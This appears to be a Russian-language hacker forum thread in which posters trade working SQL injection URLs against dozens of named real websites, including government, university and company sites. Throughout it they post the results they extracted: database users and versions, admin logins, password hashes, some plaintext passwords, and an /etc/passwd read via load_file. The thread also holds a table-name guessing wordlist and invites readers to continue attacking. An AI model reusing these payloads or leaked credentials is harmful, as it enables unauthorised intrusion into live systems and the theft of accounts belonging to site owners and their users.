http://fantasy-earth.ru/view.php?page=modul&mod=newscomm&id=-1'+union+select+1,2,3,concat_ws(0x2F,user,Password ),5,6,7,8
+from+mysql.user+limit+0,1/*

root/*7A75BB29F5CE202812218EEB56693A57AE394396



http://fantasy-earth.ru/view.php?page=modul&mod=newscomm&id=-1'+union+select+1,2,3,concat_ws(0x2F,LOGIN,PASSWOR D,EMAIL),5,6,7,8+from
+alter_odon.b_user/*

admin/e10adc3949ba59abbe56e057f20f883e/webmaster@ourtestsite.ru



http://fantasy-earth.ru/view.php?page=modul&mod=newscomm&id=-1'+union+select+1,2,3,concat_ws(0x2F,LOGIN,PASSWOR D,USE_MD5),5,6,7,8+from
+alter_odon.b_mail_mailbox+limit+0,1/*

test/6de+uCiE/N


еще присутствует IP.Board 2.2.2, но чет я так и не нашел где там хранятся юзверские пароли Оо поройтесь кому интересно:

http://fantasy-earth.ru/view.php?page=modul&mod=newscomm&id=-1'+union+select+1,2,3,concat_ws(0x2F,column_name,t able_name,table_schema),5,6,7,8+from+information_s chema.columns+where+column_name='password'/*

все таблицы где есть колонка password

http://www.marstonsdontcompromise.co.uk/ Сайт о пиве, особенно понравилось пиво с названием "Pedigree" :D

http://www.marstonsdontcompromise.co.uk/site/news_story.asp?news_id=1+or+1=(SELECT+TOP+1+cast(u sername+as+nvarchar)%2B%27%3A%27%2Bcast(password+a s+nvarchar)+from+ashes_admin)--

Походу нашел уязвимость: ищем сайты с надписью "Site by EMAC2.SCREEN". Уязвимые скрипты - все где присутствует "id=" :D. В основном "xxx_list.asp?id=".
Exploit: 1+or+1=(SELECT+TOP+1+cast(login+as+nvarchar)%2B%27 %3A%27%2Bcast(password+as+n
varchar)+from+admins)--

Логи и пароль кстати тоже всегда одинаковые - guillaume : plop :)

Примеры:

http://www.chiefinspiration.com

http://www.chiefinspiration.com/index.asp?news_id=1+or+1=(SELECT+TOP+1+cast(login+ as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarch ar)+from+admins)--

http://www.benoitoctave.com/

http://www.benoitoctave.com/books_list.asp?id=1+or+1=(SELECT+TOP+1+cast(login+ as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarch ar)+from+admins)--

http://travel.youressentialmix.com

http://travel.youressentialmix.com/books_list.asp?id=1+or+1=(SELECT+TOP+1+cast(login+ as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarch ar)+from+admins)--

http://tv.blogilvy.be/

http://tv.blogilvy.be/books_list.asp?id=1+or+1=(SELECT+TOP+1+cast(login+ as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarch ar)+from+admins)--

http://www.wagerweb.com
http://www.wagerweb.com/endorsement-detail.cfm?endorsmentid=13+union+select+1,2,user() ,4,version(),6


http://www.wagerweb.com/endorsement-detail.cfm?endorsmentid=13+union+select+1,2,3,4,ta ble_name,6+from+information_schema.tables/*
http://www.transporte3.com
http://www.transporte3.com/noticias/index.php?num=-1+union+select+1,load_file('/etc/passwd'),3,4,5,6,7,8,9/*

Газета Деловой Казахстан
PR:4
http://www.dknews.kz/leftlink.php?linkid=388&archid=-1+union+select+1,2,3,4,5/*
dknewsk@localhost:4.1.22-standard:dknewsk_manat

Посмотрите где поле '2' выводится :D

http://www.siberia-klan.ru

http://www.siberia-klan.ru/?section=creative&id=-201+union+select+1,2,username,4,user_password,6,7, 8,9,10,11+from+phpbb_users+limit+1,1/*

лимитом перебираем юзеров...

PR:3

http://www.velimobil.md/2k.php?k=2+union+select+1,2,3,concat_ws(char(58),u ser(),version(),database()),5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26/*

12811@localhost:5.0.27:12811


http://www.velimobil.md/2k.php?k=2+union+select+1,2,3,table_name,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6+from+information_schema.tables/*


PR:3

http://www.studii.md/work_view_vacancy_detail.php?id=-2740+union+select+1,2,3,concat_ws(char(58),user(), version(),database()),5,6,7,8,9,10,11,12,13,14,15, 16/*


studiim_a@localhost:4.1.21:studiim_db121682571


PR:4

http://www.youth.md/index.php?id=-36+union+select+concat_ws(char(58),user(),version( ),database())/*


webuser@localhost:5.0.22:youth


http://www.youth.md/index.php?id=-36+union+select+concat(user,char(58),password)+fro m+mysql.user/*


webuser:3011c26b11019486

http://www.itn.ru/
ЗАО "Интеграция связи" является оператором связи в г. Москве
http://www.itn.ru/01/doc.php?id_nd=-28+UNION+SELECT+user,password,3+FROM+mysql.user/*

texe.com
http://www.texe.com/view.php?page=-74+union+select+1,concat_ws(char(58,58),user(),dat abase(),version()),3,4,5/*
texecom8@truth-int.positive-internet.com::texecom8::5.0.32-Debian_7etch1
ник и пасс для входа в админку:
chris:texecom

http://www.vcs u.edu/news/php/details.php?id=-4835'+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(use r,0x78),0x78),4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29+from+mysql.use r+limit+1,1/*

дальше не добил

http://www.cambridge-centre.ru/view.phtml?cat=2&id=-1+union+select+1,database(),3,4,5,version(),user() ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 ,42/*
cambridg@dux.hc.ru
4.0.25-log
Что там еще можно сделать? я подбирал таблицы admin
admins
idadmin
idadmins
id_admin
id_admins
adminid
adminsid
admin_id
admins_id
admintable
adminstable
adminstables
admintables
tableadmin
tablesadmin
admin_table
admin_tables
table_admin
table_admins
tables_admin
user
users
iduser
idusers
id_user
id_users
userid
usersid
user_id
users_id
usertable
userstable
userstables
usertables
tableuser
tablesuser
user_table
user_tables
table_user
table_users
tables_user
id
ids
idid
idids
id_id
ids_id
id_ids
idid
idsid
id_id
ids_id
idtable
idstable
idstables
idtables
tableid
tablesid
id_table
id_tables
table_id
table_ids
tables_id
login
logins
idlogin
idlogins
id_login
id_logins
loginid
loginsid
login_id
logins_id
logintable
loginstable
loginstables
logintables
tablelogin
tableslogin
login_table
login_tables
table_login
table_logins
tables_login
webmaster
webmasters
idwebmaster
idwebmasters
id_webmaster
id_webmasters
webmasterid
webmastersid
webmaster_id
webmasters_id
webmastertable
webmasterstable
webmasterstables
webmastertables
tablewebmaster
tableswebmaster
webmaster_table
webmaster_tables
table_webmaster
table_webmasters
tables_webmaster
master
masters
idmaster
idmasters
id_master
id_masters
masterid
mastersid
master_id
masters_id
mastertable
masterstable
masterstables
mastertables
tablemaster
tablesmaster
master_table
master_tables
table_master
table_masters
tables_master
shop
shops
idshop
idshops
id_shop
id_shops
shopid
shopsid
shop_id
shops_id
shoptable
shopstable
shopstables
shoptables
tableshop
tablesshop
shop_table
shop_tables
table_shop
table_shops
tables_shop
money
moneys
idmoney
idmoneys
id_money
id_moneys
moneyid
moneysid
money_id
moneys_id
moneytable
moneystable
moneystables
moneytables
tablemoney
tablesmoney
money_table
money_tables
table_money
table_moneys
tables_money
catalog
catalogs
idcatalog
idcatalogs
id_catalog
id_catalogs
catalogid
catalogsid
catalog_id
catalogs_id
catalogtable
catalogstable
catalogstables
catalogtables
tablecatalog
tablescatalog
catalog_table
catalog_tables
table_catalog
table_catalogs
tables_catalog
title
titles
idtitle
idtitles
id_title
id_titles
titleid
titlesid
title_id
titles_id
titletable
titlestable
titlestables
titletables
tabletitle
tablestitle
title_table
title_tables
table_title
table_titles
tables_title
name
names
idname
idnames
id_name
id_names
nameid
namesid
name_id
names_id
nametable
namestable
namestables
nametables
tablename
tablesname
name_table
name_tables
table_name
table_names
tables_name
mysql
mysqls
idmysql
idmysqls
id_mysql
id_mysqls
mysqlid
mysqlsid
mysql_id
mysqls_id
mysqltable
mysqlstable
mysqlstables
mysqltables
tablemysql
tablesmysql
mysql_table
mysql_tables
table_mysql
table_mysqls
tables_mysql
sql
sqls
idsql
idsqls
id_sql
id_sqls
sqlid
sqlsid
sql_id
sqls_id
sqltable
sqlstable
sqlstables
sqltables
tablesql
tablessql
sql_table
sql_tables
table_sql
table_sqls
tables_sql
bd
bds
idbd
idbds
id_bd
id_bds
bdid
bdsid
bd_id
bds_id
bdtable
bdstable
bdstables
bdtables
tablebd
tablesbd
bd_table
bd_tables
table_bd
table_bds
tables_bd
datebase
datebases
iddatebase
iddatebases
id_datebase
id_datebases
datebaseid
datebasesid
datebase_id
datebases_id
datebasetable
datebasestable
datebasestables
datebasetables
tabledatebase
tablesdatebase
datebase_table
datebase_tables
table_datebase
table_datebases
tables_datebase
www
wwws
idwww
idwwws
id_www
id_wwws
wwwid
wwwsid
www_id
wwws_id
wwwtable
wwwstable
wwwstables
wwwtables
tablewww
tableswww
www_table
www_tables
table_www
table_wwws
tables_www
web
webs
idweb
idwebs
id_web
id_webs
webid
websid
web_id
webs_id
webtable
webstable
webstables
webtables
tableweb
tablesweb
web_table
web_tables
table_web
table_webs
tables_web
magazin
magazins
idmagazin
idmagazins
id_magazin
id_magazins
magazinid
magazinsid
magazin_id
magazins_id
magazintable
magazinstable
magazinstables
magazintables
tablemagazin
tablesmagazin
magazin_table
magazin_tables
table_magazin
table_magazins
tables_magazin
log
logs
idlog
idlogs
id_log
id_logs
logid
logsid
log_id
logs_id
logtable
logstable
logstables
logtables
tablelog
tableslog
log_table
log_tables
table_log
table_logs
tables_log
music
musics
idmusic
idmusics
id_music
id_musics
musicid
musicsid
music_id
musics_id
musictable
musicstable
musicstables
musictables
tablemusic
tablesmusic
music_table
music_tables
table_music
table_musics
tables_music
shop
shops
idshop
idshops
id_shop
id_shops
shopid
shopids
shop_id
shop_ids
shoptable
shopstable
shoptables
tableshop
tablesshop
shop_table
shop_tables
table_shop
tables_shop
money
moneys
idmoney
idmoneys
id_money
id_moneys
moneyid
moneysid
money_id
moneys_id
moneytable
moneystable
moneystables
moneytables
tablemoney
tablesmoney
money_table
money_tables
table_money
table_moneys
tables_money
и ничего =(

http://www.uazmadi.ru/shop.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),d atabase(),version()),8,9,10,11,12/*
http://www.avtobamper.ru/shop.php?id=-1+union+select+1,2,version(),database(),5,6,7,user (),9,10,11,12,13/*

vedu.ru

http://www.vedu.ru/index.asp?cont=index&news=-1+or+1=@@version--

Microsoft SQL Server 2000 - 8.00.2040 (Intel X86) May 13 2005 18:33:17 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)

http://www.vedu.ru/index.asp?cont=index&news=-1+or+1=(select+system_user)-- writer

http://www.vedu.ru/index.asp?cont=index&news=-1+or+1=(select+db_name())-- PortalDB


http://www.vedu.ru/index.asp?cont=index&news=-1+or+1=(select+top+1+cast(Username+as+nvarchar)%2B %27%3A%27%2Bcast(Password+as+nvarchar)%2B%27%3A%27 %2Bcast(Salt+as+nvarchar)%2B%27%3A%27%2Bcast(Autho r_email+as+nvarchar)+from+frm_Author)--

логин/хеш/соль/мейл
superviser:561C4AF0B29C278947A313635ADDA7:93BE1FB7 A5A:evs@sec21.ru

дальше сами )

http://www.vedu.ru/index.asp?cont=index&news=-1+or+1=(select+top+1+table_name+from+information_s chema.tables+where+table_name+not+in+('prt_FAQ','p rt_Vote','tst_razdels','dtproperties','frm_ActiveU ser','frm_Author','frm_BanList','frm_blob_file',
'frm_blob_image','frm_BuddyList','frm_Category','f rm_Configuration','frm_DateTimeFormat','frm_EmailN otify','frm_Forum','frm_Group','frm_GuestName','fr m_Permissions','frm_PMMessage','frm_Poll',%20'frm_ PollChoice','frm_Smut','frm_Thread','frm_Topic',
'frm_UserRoles','prt_announce','prt_announce_Group ','prt_Articles','prt_Articles_Comment','prt_Artic les_Group','prt_Articles_Ozenka','prt_Articles_Tre e','prt_Articles_Tree_Permissions','prt_Connector' ,'prt_FAQ_group','prt_Files','prt_Images','prt_Key s_Edulib',
'prt_myNavigator','prt_News','prt_News_Group','prt _part_name','prt_part_permissions','prt_Person'))-- и тд.

--------------------------------------------------------------------------
contester.tsure.ru

http://www.contester.tsure.ru/index.php?page=lectorium/main.php&catId=-1+union+select+concat_ws(0x2F,cast(version()+as+bi nary),cast(database()+as+binary),cast(user()+as+bi nary))/*

5.0.15-log/contest2/webapp@localhost


http://www.contester.tsure.ru/index.php?page=lectorium/main.php&catId=-1+union+select+concat_ws(0x2F,login,hash_password) +from+logins+limit+0,1/*

admin/*222512147AA24FDF67BC90EC2ED8B4E178D33600

--------------------------------------------------------------------------
stroy-press.ru

http://www.stroy-press.ru/?p=14&id=-1+union+select+1,2,concat_ws(0x2F,cast(version()+a s+binary),cast(database()+as+binary),cast(user()+a s+binary)),4,5,6,7/*

4.1.18/ccr_ru_1/ccr@localhost


http://www.stroy-press.ru/?p=14&id=-1+union+select+1,2,concat_ws(0x2F,username,passwor d),4,5,6,7+from+users+limit+1,1/*

логин/пароль
123/6W7FCY8X

http://www.mw.org.pl
http://www.mw.org.pl/t.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19+from+phpbb_users/*
не смог подобрать колонки =(

http://www.astrotur.ru
http://www.astrotur.ru/index1.php?id=-1+union+select+1,2,3/*
ostapenko_atur@localhost
4.1.20
ostapenko_atur

Компания АСКОН
smf_members (чёт не получилось просматреть юзеров)
http://www.ascon.ru/?news=361+UNION+SELECT+1,2,3,concat_ws(0x05,ID_MEM BER,ID_GROUP,memberName,passwd,passwordSalt,emailA ddress),5,6+FROM+forum.smf_members+limit+1,1/*

www.ugatu.ac.ru
http://www.ugatu.ac.ru/Aviator/read_article.php?id=-598+union+select+1,password,3,4,5,6+from+mysql.use r/*
user:csit
password:1458953a0af2898b

http://www.joygregory.co.uk/

http://www.joygregory.co.uk/news/details.asp?news_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27+from+admin/*

http://www.tupelo.net/

http://www.tupelo.net/media-room/news_detail.asp?news_id=1+or+1=(SELECT+TOP+1+cast( username+as+nvarchar)%2B%27%3A%27%2Bcast(password+ as+nvarchar)+from+Members+where+MemberID=2)--

http://www.baalynton.com/

http://www.baalynton.com/news.asp?news_id=-1+union+select+1,2,3,4,username,password,7,8,9,10, 11+from+users/*

http://www.philipgreenfield.com/


http://www.philipgreenfield.com/index.asp?news_id=1+or+1=(SELECT+TOP+1+cast(login+ as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarch ar)+from+admins)--

http://www.elittech.ru/

http://www.elittech.ru/info/news.asp?news_id=-1+union+select+1,2,3,4,5,6,7,8,9+from+admin/*

http://www.psychasoc.com
http://www.psychasoc.com/print_news.php?ID=-1+union+select+login,2,3,4,password+from+admin/*
jojo:429985a327c0097d

http://www.llatalent.com
http://www.llatalent.com/current/index.php?current_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18/*
4.0.27-standard
dbm.llatalent.com@web162.megawebservers.com
admin_llatalent_com

Центр Коммерческой недвижимости (довольно известная компания)
PR:4
http://www.ckn.ru/srochnoall.php?id=-9+union+select+1,2,concat_ws(char(58),user(),versi on(),database()),4,5,6,7,8/*

wwwrealtor@localhost:4.0.27-1-log:wwwrealtor

http://www.wttrec.com/ Че-то про теннис....

http://www.wttrec.com/news/news_info.asp?news_id=1+or+1=(SELECT+TOP+1+cast(us ername+as+nvarchar)%2B%27%3A%27%2Bcast(password+as +nvarchar)+from+users+where+user_id=1)--

Дальше перебираем по id...

www.hro.org
http://www.hro.org/get_rubric.php?id=999+union+select+1,password,3,4, 5,6,7+from+user/*
user:hroorg
password:dancer

PR:4
http://www.iron.org/chamber/members.php?id=-502+union+select+1,concat(database(),0x3a,user(),0 x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18/*
usr51730_chamber:usr51730_usr5173@localhost:4.1.22-standard-log


PR:6
http://www.eamesgallery.com/cart/prod_subcat.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,10,concat(databas e(),0x3a,user(),0x3a,version()),12,13/*
eamesgal_eostore:eamesgal@localhost:4.0.27-standard

PR:5
http://www.modculture.co.uk/books/review.php?id=-107'+union+select+1,2,3,4,concat(version(),0x3a,da tabase(),0x3a,user()),6,7,8,9,10,11,12,13,14,15,16 ,17/*
4.1.20:modculture2:modculture@localhost

PR:4
http://www.intlstockexchange.com/CompanyProfile.php?id=-25+union+select+1,concat(username,0x3a,password),3 ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30+from+users/*

communizm.ru
http://communizm.ru/index.php?mode=comment&id=-394+union+select+1,user(),3,4,5,6,7,8,9,10,11,12,1 3,14/*
5.0.32-Debian_7etch1-log


www.avd.org.ua
http://www.avd.org.ua/viewdetails.php?id=-7146+UNION+SELECT+1,username,3,4,5,6,7,8,9,10,11,1 2,13,14,15+from+user/*
4.1.22-log



aufo.ru
http://www.aufo.ru/autoinfo/?page=2&id=-45+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45, 46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62 ,63,64,65,66,67/*
5.0.26



reutov.net
http://reutov.net/iss/photo_news/news/newsone.php?id=-686+UNION+SELECT+1,2,3,4,name,pass,7,8,9+from+user s+limit+3,1/*
name:administrator
hash:c587975a6d5d82fffbe877b0292e3cfc

http://www.ruclimat.ru/categor/index.php?id_categor=-1+union+select+1,2,concat(database(),char(58),user (),char(58),version()),4,5,6,7,8,9,10,11,12,13/*
http://www.directmarketing.com.ua/print.php?id=-1+union+select+1,2,concat(database(),char(58),user (),char(58),version()),4,5,6,7/*
http://www.recipe.ru/docs/nd/print.php?id=-1+union+select+version(),2,3,4,5/*
http://www.slavneft.ru/declarations/print.php?id=-1+union+select+1,2,concat(database(),char(58),user (),char(58),version()),4,5,6,7,8/*
http://www.homeair.ru/news/view.php?id=-1+union+select+1,2,3,concat(database(),char(58),us er(),char(58),version()),5,6,7,8,9,10,11,12,13/*
http://profisport.com.ua/print.php?id=-1+union+select+concat(database(),char(58),user(),c har(58),version())/*
http://www.ekosdom.com.ua/print.php?id=-1+union+select+concat(database(),char(58),user(),c har(58),version())/*
http://moise.sefarad.org/print.php?id=-1+union+select+1,2,concat(database(),char(58),user (),char(58),version()),4,5/*
http://avtoradiator.com/print.php?id=-1+union+select+concat(database(),char(58),user(),c har(58),version())/*
Каму интересно, может продолжить ковырять, заодно и мне расскажите чего нашли интересного ;)

Интернет портал HandsPC

www.handspc.ru
http://www.handspc.ru/soft/soft.php?id=183+union+select+1,version(),3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27+--+
4.0.18-1.gm-log
http://www.handspc.ru/soft/soft.php?id=183+union+select+1,concat_ws(0x3a,user ,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27+from+mysql.user+--+
admin:3e8d9e88574ded0d

PR:2
http://et.igwane.be/page.php?id=-7+union+select+1,2,3,concat_ws(char(58),user(),ver sion(),database()),5,6,7,8,9,10,11/*

igwane_be@eu1473m.lyceu.net:5.0.24alyceu-log:igwane_be_1


http://et.igwane.be/page.php?id=-7+union+select+1,2,3,table_name,5,6,7,8,9,10,11+fr om+information_schema.tables+limit+1,1/*

count = 162...ppc

На этом мое желание работать дальше с лимитом почему-то иссякло =/

http://www.onesimpleloan.com/

http://www.onesimpleloan.com/news_display.asp?news_id=1+or+1=(SELECT+TOP+1+cast (userna me+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nva rchar)+from+cms_users)--

Admin:lcpa!87

http://www.fnplzen.cz/

http://www.fnplzen.cz/novinky_detail.asp?news_id=1+or+1=(SELECT+TOP+1+ca st(admName+as+nvarchar)%2B%27%3A%27%2Bcast(admPHas h+as+nvarchar)+from+tblQNAdmin)--

admin:-280742843

http://www.justrams.com/

http://www.justrams.com/contents/news/news_view.asp?news_id=1+or+1=(SELECT+TOP+1+cast(us ername+as+nvarchar)%2B%27%3A%27%2Bcast(password+as +nvarchar)+from+justrams_admin)--

adminjr:#jr$2007

http://www.intellijock.com/

http://www.intellijock.com/sample_profile.asp?view_id=1+or+1=(SELECT+TOP+1+ca st(login+as+nvarchar)%2B%27%3A%27%2Bcast(password+ as+nvarchar)+from+admins+where+admin_id=1)--

БД 5 значит смотрим 140 таблиц сами :)

http://www.mountain.ru/news/index.php?id_class_news=-0%20union%20select%20concat(user_name,0x3a,passwor d)+FROM+user/*

Искать в исходном тексте сайта после "<option value='/news/index.php?id_class_news="

http://www.falsecode.ru/fileinfo.php?id=77+and+ascii(lower(substring(versi on(),1,1)))=0x33/*
...ппц, такие динозавры еще живы?

www.realmusic.ua
http://www.realmusic.ua/buy.php?id=-1+union+select+1/*
www.rebellino.it
http://www.rebellino.it/shop/pag_home/multimedia.php?id=-1+union+select+1,2,user(),version(),5,database()/*
Sql47718@62.149.140.24
Sql47718_3
4.0.27-standard-log
www.3onweb.it
http://www.3onweb.it/download/guide/focuson.php?id=-1+union+select+1,2,3,4/*
тут ничего не выйдет =(

Fata1ex,хекед (http://forum.antichat.ru/showpost.php?p=519079&postcount=3980)

Узнаём имя БД и таблицу

http://et.igwane.be/page.php?id=-7+union+select+1,2,3,concat(table_schema,char(58), table_name),5,6,7,8,9,10,11+from+information_schem a.columns+where+column_name=0x6c6f67696e+limit+2,1/*

igwane_be_5.members

Узнаём столбцы

http://et.igwane.be/page.php?id=-7+union+select+1,2,3,column_name,5,6,7,8,9,10,11+f rom+information_schema.columns+where+table_name=0x 6D656D62657273+limit+3,1/*

login,password

Ну и хек

http://et.igwane.be/page.php?id=-7+union+select+1,2,3,concat(login,0x3a,password),5 ,6,7,8,9,10,11+from+igwane_be_5.members/*

admin:exuifoLgJGROk

Есть ещё таблица igwane_be_3.eck_user

http://et.igwane.be/page.php?id=-7+union+select+1,2,3,concat(login,0x3a,password),5 ,6,7,8,9,10,11+from+igwane_be_3.eck_user+limit+1,1/*

С помощью https://forum.antichat.ru/showpost.php?p=401199&postcount=18

PR:5

http://www.lesmuseesenwallonie.be/html/musee.php?id=-254+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,concat_ws(char(58),user (),version(),database()),25/*


mew@localhost:4.1.20:mew


PR:5

http://www.jeugdrodekruis.be/index.php?ID=-51+union+select+1,concat_ws(char(58),user(),versio n(),database()),3/*

jeugdrodekruisbe@217.19.238.181:5.0.27:jeugdrodekr uisbe


http://www.jeugdrodekruis.be/index.php?ID=-51+union+select+1,count(table_name),3+from+informa tion_schema.tables/*
count = 72 =(

tblMail
g2_User
...




PR:3

http://www.arriere-scene.be/saison_details.php?ID=-222+union+select+1,2,3,4,5,6,concat_ws(char(58),us er(),version(),database()),8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32, 33,34,35/*

arrieres@10.0.75.67:4.0.25-standard-log:arrieres

http://www.spbreligion.ru/news.php?id=-1'+union+select+1,2,3,concat_ws(0x2F,cast(version( )+as+binary),cast(database()+as+binary),cast(user( )+as+binary)),5,6,7,8,9,10/*

4.1.15/spbreligion/root@localhost
-------------------------------------------------------------------------

http://www.portal-ug.ru/news/?id=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5,6,7,8/*

4.1.20-lk-log/portugru_new/portugru_new@localhost
-------------------------------------------------------------------------

http://www.finnews.ru/cur_new.php?idnws=-1+union+select+concat_ws(0x2F,version(),database() ,user())/*

5.0.45-log/u13279/u13279@10.10.223.217
-------------------------------------------------------------------------

http://www.vi1.ru/index.php?id=1&news=-4+union+select+1,2,3,4,concat_ws(0x2F,version(),da tabase(),user()),6,7,8,1/*

4.1.20/vb1ru/fyG6ds9@localhost

Хотел купить новый доктор мартинс и наткнулся :
http://www.shoes.ru/index.php?akus=4&id=-111+UNION+SELECT+1,2,3,AES_DECRYPT(AES_ENCRYPT(con cat_ws(0x3a,login,pwd),0x71),0x71),5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19+from+users/*
там еще есть форум пхпбб, но не префикс не смог подобрать, удачи ;)

http://www.e28.dk/Forum/infusions/calendar_events_panel/show_single.php?sel=-1/**/UNION/**/SELECT/**/0,0,user_password,user_name,0,0,0,0,0,0,0,0/**/FROM/**/fusion_users/**/WHERE/**/user_id=1/*

Италия

crengineering.ithttp://www.crengineering.it/dettaglio.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5,6,7,8,9,10,11,12,13,14,15,16/* 4.1.22-standard:crengine_cr:crengine_cr@localhost

RockLab.ithttp://www.rocklab.it/dett_news.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6/* 4.0.27-standard-log:rocklab_it:rocklab@localhost

opificium.ithttp://www.opificium.it/sezione.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9/* 5.0.27:dbopificium:josemiguel@localhost

root [ login : MySQL(pass) ] :root : 646990a7615f4ff5aci.it - Автомобильный Клуб Италииhttp://www.aci.it/index.php?id=299&no_cahce=1&tx_ttnews[tt_news]=-1+union+select+1,concat_ws(0x3a,version(),database (),user())/*&tx_ttnews[backPid]=85&limit=0 5.0.22:aci_4051:aci405@172.24.18.10

Наши таблицы:be_users
be_users2
fe_users
Админ [username:md5(password):email] :l.feti : a7667861d4fd273bfb352f1dc6d319be : your@email.com GOV

gg.gov.auhttp://www.gg.gov.au/governorgeneral/content.php?id=-1+union+select+1,2,concat(aes_decrypt(aes_encrypt( version(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt (database(),0x71),0x71),0x3a,aes_decrypt(aes_encry pt(user(),0x71),0x71)),4,5,6,7,8,9,10,11,12,13/* 4.1.11-Debian_4sarge7:govgen:gg@localhost

gitd.gov.pl - типа Главная Инспекция Транспортного Движения Польшиhttp://www.gitd.gov.pl/witd.php?id2=-1+union+select+null,version(),null,null,null,null, null,null,null,null,null,null,null,null,null,null-- version() :PostgreSQL 8.2.1 on i386-unknown-freebsd6.2, compiled by GCC gcc (GCC) 3.4.6 [FreeBSD] 20060305 user : gitd

119 таблиц:http://www.gitd.gov.pl/witd.php?id2=-1+union+select+null,TABLE_NAME,null,null,null,null ,null,null,null,null,null,null,null,null,null,null +from+INFORMATION_SCHEMA.TABLES+limit+1+offset+118-- интересные табы:administrable_role_authorizations
pg_auth_members
pg_database
pg_user Но данные из таблиц достать не удалось
:mad:
Кто подскажет в чём трабла - [+++] !

http://www.rrhhdigital.es/noticia_ampliada.asp?id=21541'%20or%201=@@version--
имена таблиц:

'documentacion'
'enlaces_categorias'
'enlaces'
'dtproperties'
'foro_usuarios'
'foros'
'opinion'
'foro_temas'
'entrevistas'
'foro_comentarios'
'banner_patrocinio'
'boletin_envios'
'entrevistas_boletin'
'se_rumorea'
'agenda_categorias'
'mostrar_en_boletin'
'empresa'
'foro'
'secciones'
'admin_usuarios'
'admin_secciones'
'admin_usuarios_secciones'
't_jiaozhu'
'banner_secciones'
'firmas'
'noticias'
'boletin_copia'
'boletin2'
'banner'
'boletin'
'humor'
'asesor'
'agenda'
'noticias_relaciones'
'encuesta'
'votaciones'

бд 4
http://www.eurofind.net/Articles/index.php?id=69+UNION+SELECT+1,concat(login,0x3a,p assword),3,4,5,6,7,8+FROM+users+LIMIT+1,1/*
Так же есть столбик ICQ но перебор уже начал )

Италия

ItalienI.it - Италия Интернэшнлhttp://www.italieni.it/page.php?id=-1+union+select+1,2,3,4,5,aes_decrypt(aes_encrypt(c oncat_ws(0x3a,version(),database(),user()),0x71),0 x71),7,8,9,10,11,12/* 4.1.10-log:internazionale_italieni:inter_italieni@10.10.0 .11

Таба users http://www.italieni.it/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,aes_decrypt(ae s_encrypt(concat_ws(0x3a,username,password,email,a dmin,id),0x71),0x71),12+from+users+limit+0,1/*

www.mysql.com 0_o
http://www.mysql.com/training/venue.php?id=-MX-MexicoCity-IPCOM'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,VERSION(),22,23,24,25,26,27,2 8,29,30,31/*
Версия - 5.1.22-rc-log
Юзер - webslave@172.16.18.103
if version=5.xx then we have access to information_schema.tables
Таблиц оч. много, но не из одной из них прочитать ничего нельзя ((
Но есть доступ к mysql.user - http://www.mysql.com/training/venue.php?id=-MX-MexicoCity-IPCOM'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,concat(user,0x3a,password),22 ,23,24,25,26,27,28,29,30,31+from+mysql.user/*
p.s.Юбилейный пост в теме =)
p.s.s.Уже не юбилейный =(

www.sportnet.ee
http://www.sportnet.ee/index.php?id=12402&news_id=999999999)+union+select+1,2,3,4,AES_DECRYP T(AES_ENCRYPT(version(),0x71),0x71),6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21+--+&light= 4.1.15


www.gg.gov.au
http://www.gg.gov.au/governorgeneral/content.php?id=26+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12,13+--+
GIT. ГАЛАКТИКА ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ
www.galaxyit.ru
http://www.galaxyit.ru/safe-systems/article_full.php?id=-1+union+select+1,2,version(),4,5,6,7,8+--+ 4.1.22-standard

Раскручивать не пробовал, ибо соксы тупят (

Официальный сайт НЗШВ
http://www.nzshv.ru/interview.php?id=-1+union+select+1,2,3,4,5,6,7,8/*

Database error: Invalid SQL: select * from interview where id=-1 union select 1,2,3,4,5,database(),7,8/*
